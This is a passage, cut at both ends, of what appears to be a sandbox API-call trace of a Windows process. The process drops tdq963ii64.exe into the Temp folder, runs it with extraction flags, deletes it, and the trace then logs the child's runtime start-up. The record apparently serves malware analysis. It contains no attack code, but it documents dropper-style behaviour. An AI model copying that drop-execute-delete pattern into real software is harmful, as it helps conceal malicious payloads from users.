returned 0x43c648 [0236.724] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x18) returned 0x2a8238 [0236.725] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0236.726] GetFileType (hFile=0x94) returned 0x1 [0236.726] WriteFile (in: hFile=0x94, lpBuffer=0x43c648*, nNumberOfBytesToWrite=0x37000, lpNumberOfBytesWritten=0x18df04, lpOverlapped=0x0 | out: lpBuffer=0x43c648*, lpNumberOfBytesWritten=0x18df04*=0x37000, lpOverlapped=0x0) returned 1 [0236.731] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x1000) returned 0x2a97b8 [0236.731] WriteFile (in: hFile=0x94, lpBuffer=0x2a97b8*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x18df00, lpOverlapped=0x0 | out: lpBuffer=0x2a97b8*, lpNumberOfBytesWritten=0x18df00*=0x490, lpOverlapped=0x0) returned 1 [0236.732] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2a97b8 | out: hHeap=0x290000) returned 1 [0236.732] CloseHandle (hObject=0x94) returned 1 [0236.732] GetCommandLineW () returned="tdq963ii.exe -accepteula \"told.exe\" -nobanner" [0236.732] CreateProcessW (in: lpApplicationName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe", lpCommandLine="tdq963ii.exe -accepteula \"told.exe\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18facc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fb10 | out: lpCommandLine="tdq963ii.exe -accepteula \"told.exe\" -nobanner", lpProcessInformation=0x18fb10*(hProcess=0x98, hThread=0x94, dwProcessId=0x5d0, dwThreadId=0x544)) returned 1 [0236.754] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) returned 0x0 [0248.067] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe")) returned 1 [0248.069] CloseHandle (hObject=0x98) returned 1 [0248.069] CloseHandle (hObject=0x94) returned 1 [0248.070] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2a7780 | out: hHeap=0x290000) returned 1 [0248.070] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0248.070] ExitProcess (uExitCode=0x0) [0248.070] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2a6080 | out: hHeap=0x290000) returned 1 Process: id = "248" image_name = "tdq963ii64.exe" filename = "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe" page_root = "0x27978000" os_pid = "0x490" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "241" os_parent_pid = "0x120" cmd_line = "tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 852 os_tid = 0x5e4 [0234.281] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff38 | out: lpSystemTimeAsFileTime=0x12ff38*(dwLowDateTime=0x42893360, dwHighDateTime=0x1d68287)) [0234.282] GetCurrentThreadId () returned 0x5e4 [0234.282] GetCurrentProcessId () returned 0x490 [0234.282] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff40 | out: lpPerformanceCount=0x12ff40*=35462055206) returned 1 [0234.283] GetProcessHeap () returned 0x2d0000 [0234.284] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77940000 [0234.284] GetProcAddress (hModule=0x77940000, lpProcName=0x1400212e0) returned 0x77957190 [0234.285] GetProcAddress (hModule=0x77940000, lpProcName="FlsFree") returned 0x779515b0 [0234.285] GetProcAddress (hModule=0x77940000, lpProcName="FlsGetValue") returned 0x77963520 [0234.285] GetProcAddress (hModule=0x77940000, lpProcName="FlsSetValue") returned 0x7795bd90 [0234.285] GetProcAddress (hModule=0x77940000, lpProcName="InitializeCriticalSectionEx") returned 0x779579b0 [0234.285] GetProcAddress (hModule=0x77940000, lpProcName="CreateEventExW") returned 0x7798c590 [0234.285] GetProcAddress (hModule=0x77940000, lpProcName="CreateSemaphoreExW") returned 0x7798c4c0 [0234.285] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadStackGuarantee") returned 0x77948050 [0234.285] GetProcAddress (hModule=0x77940000, lpProcName="CreateThreadpoolTimer") returned 0x77948820 [0234.285] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadpoolTimer") returned 0x77a7b2f0 [0234.286] GetProcAddress (hModule=0x77940000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77a6d8c0 [0234.286] GetProcAddress (hModule=0x77940000, lpProcName="CloseThreadpoolTimer") returned 0x77a6d620 [0234.286] GetProcAddress (hModule=0x77940000, lpProcName="CreateThreadpoolWait") returned 0x7798ba80 [0234.286] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadpoolWait") returned 0x77a7e170 [0234.286] GetProcAddress (hModule=0x77940000, lpProcName="CloseThreadpoolWait") returned 0x77a6c540 [0234.286] GetProcAddress (hModule=0x77940000, lpProcName="FlushProcessWriteBuffers") returned 0x77ab1f80 [0234.286] GetProcAddress (hModule=0x77940000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77b2ec60 [0234.286] GetProcAddress (hModule=0x77940000, lpProcName="GetCurrentProcessorNumber") returned 0x77ab0040 [0234.286] GetProcAddress (hModule=0x77940000, lpProcName="GetLogicalProcessorInformation") returned 0x7798b820 [0234.286] GetProcAddress (hModule=0x77940000, lpProcName="CreateSymbolicLinkW") returned 0x779b5ad0 [0234.286] GetProcAddress (hModule=0x77940000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0234.287] GetProcAddress (hModule=0x77940000, lpProcName="EnumSystemLocalesEx") returned 0x7798c3d0 [0234.287] GetProcAddress (hModule=0x77940000, lpProcName="CompareStringEx") returned 0x7798b980 [0234.287] GetProcAddress (hModule=0x77940000, lpProcName="GetDateFormatEx") returned 0x779d0920 [0234.287] GetProcAddress (hModule=0x77940000, lpProcName="GetLocaleInfoEx") returned 0x77943c10 [0234.287] GetProcAddress (hModule=0x77940000, lpProcName="GetTimeFormatEx") returned 0x779cd4e0 [0234.287] GetProcAddress (hModule=0x77940000, lpProcName="GetUserDefaultLocaleName") returned 0x7798b790 [0234.287] GetProcAddress (hModule=0x77940000, lpProcName="IsValidLocaleName") returned 0x7798b770 [0234.287] GetProcAddress (hModule=0x77940000, lpProcName="LCMapStringEx") returned 0x7798b710 [0234.287] GetProcAddress (hModule=0x77940000, lpProcName="GetCurrentPackageId") returned 0x0 [0234.287] GetProcAddress (hModule=0x77940000, lpProcName="GetTickCount64") returned 0x77949450 [0234.287] GetProcAddress (hModule=0x77940000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0234.287] GetProcAddress (hModule=0x77940000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0234.288] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x478) returned 0x2ef080 [0234.288] GetCurrentThreadId () returned 0x5e4 [0234.288] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x28) returned 0x2e5f00 [0234.289] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb00) returned 0x2ef500 [0234.289] GetStartupInfoW (in: lpStartupInfo=0x12fe90 | out: lpStartupInfo=0x12fe90*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x14000c2d0, hStdError=0x2ef080)) [0234.289] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0234.289] GetFileType (hFile=0x3) returned 0x2 [0234.289] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.289] GetFileType (hFile=0x7) returned 0x2 [0234.290] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0234.290] GetFileType (hFile=0xb) returned 0x2 [0234.290] GetCommandLineW () returned="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" [0234.290] GetEnvironmentStringsW () returned 0x2f0010* [0234.290] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xb3e) returned 0x2f0b60 [0234.291] FreeEnvironmentStringsW (penv=0x2f0010) returned 1 [0234.291] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14002c980, nSize=0x104 | out: lpFilename="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe")) returned 0x33 [0234.291] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xb8) returned 0x2f16b0 [0234.291] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x138) returned 0x2f1770 [0234.291] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x3e) returned 0x2e62e0 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x6c) returned 0x2f18b0 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x62) returned 0x2f1930 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x78) returned 0x2f19a0 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x62) returned 0x2f1a20 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x2e) returned 0x2eddf0 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x48) returned 0x2e6330 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x30) returned 0x2ede30 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x28) returned 0x2e5f30 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x1a) returned 0x2e5f60 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x4a) returned 0x2f1a90 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x72) returned 0x2f1af0 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x30) returned 0x2ede70 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x2e) returned 0x2edeb0 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x1c) returned 0x2e5f90 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xd2) returned 0x2f1b70 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x7c) returned 0x2f1c50 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x3a) returned 0x2e6380 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x90) returned 0x2f1ce0 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x24) returned 0x2e5fc0 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x30) returned 0x2edef0 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x36) returned 0x2edf30 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x3c) returned 0x2e63d0 [0234.292] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x52) returned 0x2f1d80 [0234.293] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x3c) returned 0x2e6420 [0234.293] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x18) returned 0x2f1de0 [0234.293] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x82) returned 0x2f1e00 [0234.293] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x2e) returned 0x2edf70 [0234.293] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x1e) returned 0x2e5ff0 [0234.293] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x2c) returned 0x2edfb0 [0234.293] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x54) returned 0x2f1e90 [0234.293] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x52) returned 0x2f1ef0 [0234.293] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x2a) returned 0x2edff0 [0234.293] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x3c) returned 0x2e6470 [0234.293] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x54) returned 0x2f1f50 [0234.293] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x24) returned 0x2e6020 [0234.293] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x30) returned 0x2ee030 [0234.293] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x8c) returned 0x2f0010 [0234.293] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0b60 | out: hHeap=0x2d0000) returned 1 [0234.294] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x1000) returned 0x2f00b0 [0234.294] GetLastError () returned 0x0 [0234.294] SetLastError (dwErrCode=0x0) [0234.294] GetLastError () returned 0x0 [0234.294] SetLastError (dwErrCode=0x0) [0234.294] GetLastError () returned 0x0 [0234.294] SetLastError (dwErrCode=0x0) [0234.294] GetACP () returned 0x4e4 [0234.295] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x228) returned 0x2f10c0 [0234.295] GetLastError () returned 0x0 [0234.295] SetLastError (dwErrCode=0x0) [0234.295] IsValidCodePage (CodePage=0x4e4) returned 1 [0234.295] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe00 | out: lpCPInfo=0x12fe00) returned 1 [0234.295] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f8a0 | out: lpCPInfo=0x12f8a0) returned 1 [0234.295] GetLastError () returned 0x0 [0234.295] SetLastError (dwErrCode=0x0) [0234.295] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0234.295] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x12f5a0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㾢̽螩") returned 256 [0234.295] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㾢̽螩", cchSrc=256, lpCharType=0x12fbc0 | out: lpCharType=0x12fbc0) returned 1 [0234.295] GetLastError () returned 0x0 [0234.295] SetLastError (dwErrCode=0x0) [0234.295] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0234.295] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x12f590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0234.296] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0234.296] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x12f380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0234.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x12f9c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0234.296] GetLastError () returned 0x0 [0234.296] SetLastError (dwErrCode=0x0) [0234.296] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0234.296] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x12f590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0234.296] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0234.296] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x12f380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0234.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x12fac0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" 